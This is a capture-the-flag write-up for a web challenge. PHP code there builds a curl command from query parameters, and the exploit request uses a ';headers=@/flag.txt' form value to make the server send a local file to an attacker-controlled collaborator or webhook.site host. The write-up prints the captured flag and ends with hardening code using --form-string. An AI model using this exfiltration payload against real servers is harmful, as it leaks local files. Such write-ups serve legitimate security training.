Tags: web
Source code of the challenge:
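```
<?php
// Refuse requests that originate from the server itself.
if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
    die('curl :thonk:');
}

// Defaults, each overridable through a query parameter.
$url = 'http://localhost';
$method = 'GET';
$formParams = [];
if (isset($_GET['url'])) { $url = $_GET['url']; }
if (isset($_GET['method'])) { $method = $_GET['method']; }
if (isset($_GET['formParams'])) { $formParams = $_GET['formParams']; }

$cmd = 'curl ';
// Disables only the file:// scheme for the URL.
$cmd .= '--proto -file ';
$cmd .= escapeshellarg($url).' ';
$cmd .= '-X ';
$cmd .= escapeshellarg($method).' ';
foreach ($formParams as $key => $value) {
    // Only the key is validated; the value is passed through unchecked.
    if (preg_match("/^\w+$/", $key)) {
        $cmd .= '-F ';
        // escapeshellarg() stops shell injection, but curl still parses
        // the -F value itself (for example '@file' and ';headers=@file').
        $cmd .= escapeshellarg($key.'= '.$value);
    }
}
header('Content-Type: text/plain');
system($cmd);
```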
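Read the [curl manual](https://curl.se/docs/manpage.html): it documents that a `-F` value can load custom headers for a form part from a local file. Use the following example from the manual as the basis of the solution:
```
curl -F "submit=OK;headers=@headerfile" example.com
```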
Request sent to the server:
```
GET /?url=[insert burp collaborator or webhook.site payload here]&method=GET&formParams[submit]=a;headers=@/flag.txt HTTP/1.1
Host: raas-v1.asisctf.com:9000
[...]
```
Request received on the burp collaborator/webhook.site from the server:
```
GET / HTTP/1.1
User-Agent: curl/7.74.0
[...]
ASIS{still-curl-df23a2f}
```
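A mitigation for the `-F` parsing used above, as an added example that is not part of the original write-up or the challenge code: curl's `--form-string` option sends the field value literally instead of interpreting it. The function names and the sample input are assumptions made for illustration.

```php
<?php
// Added example, not the challenge author's code.

// Mirrors the challenge: curl parses the value of -F, so '@file', '<file'
// and ';headers=@file' inside the value are acted on by curl.
function build_form_args_original(array $formParams): string
{
    $args = '';
    foreach ($formParams as $key => $value) {
        if (preg_match('/^\w+$/', (string)$key)) {
            $args .= '-F ' . escapeshellarg($key . '=' . $value) . ' ';
        }
    }
    return $args;
}

// Hardened: --form-string uses the value string literally, so the whole
// value is sent as field content and no local file is read.
function build_form_args_hardened(array $formParams): string
{
    $args = '';
    foreach ($formParams as $key => $value) {
        // Same key check as the challenge, plus: skip nested arrays
        // (formParams[a][b]=...), which would otherwise reach the
        // string concatenation as a non-string value.
        if (!is_string($value) || !preg_match('/^\w+$/', (string)$key)) {
            continue;
        }
        $args .= '--form-string ' . escapeshellarg($key . '=' . $value) . ' ';
    }
    return $args;
}

// Constructed input that mirrors the request shown in this write-up.
$sample = ['submit' => 'a;headers=@/flag.txt'];

echo build_form_args_original($sample), PHP_EOL;
echo build_form_args_hardened($sample), PHP_EOL;
```

With the hardened builder the receiving server sees a `submit` field whose content is the literal string `a;headers=@/flag.txt`, rather than the contents of the file as request part headers.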